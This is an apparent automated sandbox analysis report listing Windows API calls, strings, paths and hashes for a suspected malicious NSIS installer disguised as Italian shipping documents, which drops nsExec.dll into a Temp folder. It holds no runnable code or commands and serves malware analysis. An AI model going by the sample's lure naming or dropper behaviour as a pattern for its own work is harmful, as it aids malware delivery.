ShowWindow.USER32(?,00000008), ref: 00405919
ShowWindow.USER32(00000008), ref: 00405963
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
CreatePopupMenu.USER32 ref: 004059A8
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
GetWindowRect.USER32(?,?), ref: 004059DC
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
OpenClipboard.USER32(00000000), ref: 00405A3D
EmptyClipboard.USER32 ref: 00405A43
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
GlobalLock.KERNEL32(00000000), ref: 00405A59
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
CloseClipboard.USER32 ref: 00405A9E

Strings

{, xrefs: 00405981

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6ac74cf2b0cd8326ebbb69d62323ae371d5bd3f712404c75dedbcee8fb33a3cc
Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
Opcode Fuzzy Hash: 6ac74cf2b0cd8326ebbb69d62323ae371d5bd3f712404c75dedbcee8fb33a3cc
Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58

Function 00405C63 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405C8C
lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405CD4
lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405CF7
lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405CFD
FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405D0D
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
FindClose.KERNEL32(00000000), ref: 00405DBC

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C70
"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe", xrefs: 00405C6C
pB, xrefs: 00405CBC
\*.*, xrefs: 00405CCE

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$pB
API String ID: 2035342205-473530011
Opcode ID: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
Opcode Fuzzy Hash: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE

Function 004068B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
FindClose.KERNEL32(00000000), ref: 004068CB

Strings

C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp, xrefs: 004068B4

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp
API String ID: 2295610775-1031832637
Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9

Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291F

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
Opcode Fuzzy Hash: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A

Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
ShowWindow.USER32(?), ref: 00404033
GetWindowLongW.USER32(?,000000F0), ref: 00404045
ShowWindow.USER32(?,00000004), ref: 0040405E
DestroyWindow.USER32 ref: 00404072
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
GetDlgItem.USER32(?,?), ref: 004040AA
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
IsWindowEnabled.USER32(00000000), ref: 004040C5
GetDlgItem.USER32(?,00000001), ref: 00404170
GetDlgItem.USER32(?,00000002), ref: 0040417A
SetClassLongW.USER32(?,000000F2,?), ref: 00404194
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
GetDlgItem.USER32(?,00000003), ref: 0040428B
ShowWindow.USER32(00000000,?), ref: 004042AC
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BE
EnableWindow.USER32(?,?), ref: 004042D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
EnableMenuItem.USER32(00000000), ref: 004042F6
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
ShowWindow.USER32(?,0000000A), ref: 00404493

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D

Function 00403C29 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978

lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe",00008001), ref: 00403CAA
lstrlenW.KERNEL32(Exec,?,?,?,Exec,00000000,C:\Users\user\AppData\Local\acneform,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D2A
lstrcmpiW.KERNEL32(?,.exe,Exec,?,?,?,Exec,00000000,C:\Users\user\AppData\Local\acneform,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
GetFileAttributesW.KERNEL32(Exec), ref: 00403D48
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\acneform), ref: 00403D91

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

RegisterClassW.USER32(004336A0), ref: 00403DCE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
ShowWindow.USER32(00000005,00000000), ref: 00403E51
GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
RegisterClassW.USER32(004336A0), ref: 00403E93
DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2

Strings

RichEd20, xrefs: 00403E57
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2E
"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe", xrefs: 00403C2C
.DEFAULT\Control Panel\International, xrefs: 00403C95
_Nb, xrefs: 00403DAD, 00403E15
Exec, xrefs: 00403CF1, 00403CFA, 00403D08, 00403D57, 00403D5D
RichEdit20W, xrefs: 00403E75, 00403E7B
Control Panel\Desktop\ResourceLocale, xrefs: 00403C5D
.exe, xrefs: 00403D37
RichEd32, xrefs: 00403E65
1033, xrefs: 00403C49, 00403CA5
RichEdit, xrefs: 00403E84
C:\Users\user\AppData\Local\acneform, xrefs: 00403CB9, 00403CC1, 00403D64, 00403D6A, 00403D7A

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\acneform$Control Panel\Desktop\ResourceLocale$Exec$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-3919183028
Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

Function 00403082 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403093
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,00000400), ref: 004030AF

Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe,80000000,00000003), ref: 004030FB
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231

Strings

Inst, xrefs: 00403167
C:\Users\user\Desktop, xrefs: 004030DD, 004030E2, 004030E8
C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe, xrefs: 00403099, 004030A8, 004030BC, 004030DC
"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe", xrefs: 00403088
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
soft, xrefs: 00403170
Error launching installer, xrefs: 004030D2
Null, xrefs: 00403179

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3691143469
Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD

Function 00406594 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Exec,00000400), ref: 004066B6
GetWindowsDirectoryW.KERNEL32(Exec,00000400,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,?,?,00000000,00000000,00424620,74DF23A0), ref: 004066CC
SHGetPathFromIDListW.SHELL32(00000000,Exec), ref: 0040672A
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,?,?,00000000,00000000,00424620,74DF23A0), ref: 0040675E
lstrlenW.KERNEL32(Exec,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,?,?,00000000,00000000,00424620,74DF23A0), ref: 004067B8

Strings

Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll, xrefs: 004065B8
Exec, xrefs: 004065C1, 0040667B, 00406682, 00406686, 0040669F, 004066A0, 004066B5, 004066CB, 004066FC, 00406728, 0040675D, 00406763, 00406780, 00406793, 004067B1, 004067B7, 004067C0, 004067F5
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406758
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406687

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: Exec$Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4024019347-971762196
Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E

Function 004032B9 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403323
GetTickCount.KERNEL32 ref: 004033CA
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033F3
wsprintfW.USER32 ref: 00403406

Strings

A, xrefs: 00403483
... %d%%, xrefs: 00403400
*B, xrefs: 004032E4
FB, xrefs: 004033A7, 004033C2, 0040343F
A, xrefs: 00403379

Memory Dump Source

Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ FB$ A$ A$... %d%%
API String ID: 551687249-3833040932
Opcode ID: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
Opcode Fuzzy Hash: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Exec,C:\Users\user\AppData\Local\acneform,?,?,00000031), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,Exec,Exec,00000000,00000000,Exec,C:\Users\user\AppData\Local\acneform,?,?,00000031), ref: 004017DA

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
